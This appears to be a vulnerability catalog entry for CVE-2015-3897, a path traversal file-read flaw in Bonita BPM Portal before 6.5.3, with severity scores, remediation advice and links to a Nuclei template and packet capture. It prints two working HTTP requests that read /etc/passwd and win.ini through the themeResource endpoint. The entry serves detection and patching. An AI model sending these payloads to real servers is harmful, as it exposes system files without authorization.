| Title | Bonita BPM Portal <6.5.3 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.6034 |
| CVE ID | CVE-2015-3897 |
| CWE ID | CWE-22 |
| Tags | cve2015 cve unauth packetstorm bonita lfi bonitasoft vkev vuln |
Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-3897.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-3897.pcap
N/AN/A